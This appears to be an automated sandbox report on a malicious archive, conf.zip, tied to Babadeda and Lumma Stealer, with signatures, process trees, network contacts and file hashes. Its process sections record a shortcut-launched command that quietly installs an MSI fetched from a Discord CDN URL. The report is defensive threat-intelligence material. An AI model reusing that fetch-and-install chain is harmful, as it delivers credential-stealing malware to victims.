Analysis Overview
SHA256
884ef747b4d2d5475674db0544a8bd4f3dde6f4f5ae4c7523331ebcbd31d6f27
Threat Level: Known bad
The file conf.zip was found to be: Known bad.
Malicious Activity Summary
Babadeda Crypter
Babadeda
Lumma Stealer
Blocklisted process makes network request
Executes dropped EXE
Use of msiexec (install) with remote resource
Loads dropped DLL
Enumerates connected drives
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Suspicious behavior: GetForegroundWindowSpam
Opens file in notepad (likely ransom note)
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2023-08-27 22:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-27 22:29
Reported
2023-08-27 22:32
Platform
win7-20230712-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Use of msiexec (install) with remote resource
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1864 wrote to memory of 2804 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\msiexec.exe |
| PID 1864 wrote to memory of 2804 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\msiexec.exe |
| PID 1864 wrote to memory of 2804 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\msiexec.exe |
| PID 1864 wrote to memory of 2804 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\msiexec.exe |
| PID 1864 wrote to memory of 2804 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\msiexec.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\data_conf.lnk
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i https://cdn.discordapp.com/attachments/1139130854761844741/1139155521396559954/aspose.msi /quiet
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2023-08-27 22:29
Reported
2023-08-27 22:32
Platform
win10v2004-20230703-en
Max time kernel
142s
Max time network
147s
Command Line
Signatures
Babadeda
Babadeda Crypter
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Lumma Stealer
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
Use of msiexec (install) with remote resource
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9DB8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA155.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI95C8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9FFB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA0D7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA2CD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA2DD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA494.tmp | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 216 wrote to memory of 4884 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\msiexec.exe |
| PID 216 wrote to memory of 4884 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\msiexec.exe |
| PID 2712 wrote to memory of 4960 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\syswow64\MsiExec.exe |
| PID 2712 wrote to memory of 4960 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\syswow64\MsiExec.exe |
| PID 2712 wrote to memory of 4960 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\syswow64\MsiExec.exe |
| PID 2712 wrote to memory of 4628 | N/A | C:\Windows\system32\msiexec.exe | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe |
| PID 2712 wrote to memory of 4628 | N/A | C:\Windows\system32\msiexec.exe | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe |
| PID 2712 wrote to memory of 4628 | N/A | C:\Windows\system32\msiexec.exe | C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\data_conf.lnk
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i https://cdn.discordapp.com/attachments/1139130854761844741/1139155521396559954/aspose.msi /quiet
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 104D06A2D1432D9B994AF864E681C1C4
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe
"C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4628 -ip 4628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4628 -ip 4628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1448
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic-node.io | udp |
| US | 188.114.97.0:80 | gstatic-node.io | tcp |
| US | 188.114.97.0:80 | gstatic-node.io | tcp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.23.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.69.13.in-addr.arpa | udp |
Files
C:\Windows\Installer\MSI95C8.tmp
| MD5 | c3798ee9903ba07a6608ad0778d422d3 |
| SHA1 | b12ee580df86de2cabf8a921bc9652ad1e874f20 |
| SHA256 | 5096934b3f97efee0dfc0f5d2b10ee1c78be523238a6f2685b58d36b8ff80cdd |
| SHA512 | 5c0afd03d9de60d1643f8db33609b478e95f0e3a7bdeffca2ad858175716ec7565fdcf90b125235a5c894049fd992485ffcf1b425db96719c6b9ad825359fb60 |
C:\Windows\Installer\MSI9DB8.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSI9DB8.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSI9FFB.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSI9FFB.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSIA0D7.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSIA0D7.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSIA0D7.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSIA155.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSIA155.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSIA2CD.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSIA2CD.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSIA2DD.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Windows\Installer\MSIA2DD.tmp
| MD5 | a9941233b9415b479d3b4f3732161eab |
| SHA1 | cb2d99af52b3b1c712943b13e45d85c80c732e57 |
| SHA256 | ce34cc14e8d26119e1bf28a3a8368da6e10d13851004e2675976c5ad58b122e2 |
| SHA512 | cfd6c425587e5e7c57b6f4655e2a48c871313e2bacf63cc0955ccae1a384610644f26aa76bee0a2a327cd77c2ae7def8ea9cb0c7c7c87fab1c8196bac82037f7 |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe
| MD5 | 700f45b97576c03feb6e7f82f34f92a5 |
| SHA1 | c6d4639261874019aab3d1edecebf827652b4dd4 |
| SHA256 | 8d8ed55802b825f7ec8b19008f00fa2514ede5010350975295cbdc4700ffaace |
| SHA512 | c54d342d968b9c28748b6226fbf35f4a417baa57568a11ce37dfc5996f6f18492b9ce9c558e24b82a4d17257fd6fae7d00b2d270703cbb9961ffe10ae27cfe8f |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.exe
| MD5 | 700f45b97576c03feb6e7f82f34f92a5 |
| SHA1 | c6d4639261874019aab3d1edecebf827652b4dd4 |
| SHA256 | 8d8ed55802b825f7ec8b19008f00fa2514ede5010350975295cbdc4700ffaace |
| SHA512 | c54d342d968b9c28748b6226fbf35f4a417baa57568a11ce37dfc5996f6f18492b9ce9c558e24b82a4d17257fd6fae7d00b2d270703cbb9961ffe10ae27cfe8f |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.dll
| MD5 | 868a85db64eb92a821e6928a9e161270 |
| SHA1 | b853cff977b4e5c80463e7c94287332b28e47537 |
| SHA256 | 67be9154c7c4f83d1009b434a8dadb7b64083db602e0dd4fb6f4c0b64eabcd64 |
| SHA512 | 9013976f07ca492fabb69ae276d80d07198f52eccc34a1f7f50e3c6167721f95b2730bdd151133bc626ff1b3de5391a9c9994163153edc8af247b041d77cb95c |
C:\Config.Msi\e57a385.rbs
| MD5 | c22da31a479b9e219a7b33be6fa2eff7 |
| SHA1 | 4cb7151f2105b05df7138dc7c4ed3cefc5e45ef9 |
| SHA256 | f26b97f8673e96a08d99754f5267c147487976d32ca35089c106e2af4da19714 |
| SHA512 | c481d8388da228daeb7c790608f82ffb58f4f2d98016c1d35f695cc3026902295d5fc2a097cde4c7acf89714da8a8fb352fa9153e672d398c2e3c266f3f6bd26 |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\gif-v2.dll
| MD5 | dd3d067c139254d741a8b4f3a8af216e |
| SHA1 | dddbb19996620ddfd9e9625f4c502356efed2c25 |
| SHA256 | e19006a51b60dcc3e212948ff5531bb7a4c69f832f256de13b84aa646baf8c57 |
| SHA512 | 04ef2d19a5c5c49817ee9214d7eeae513795a440209923009caa6283cc467762837fc2da5ac20c517a7326fde2fffca444b011e5bee089ecf6bb1177b705734c |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\gif-v2.dll
| MD5 | dd3d067c139254d741a8b4f3a8af216e |
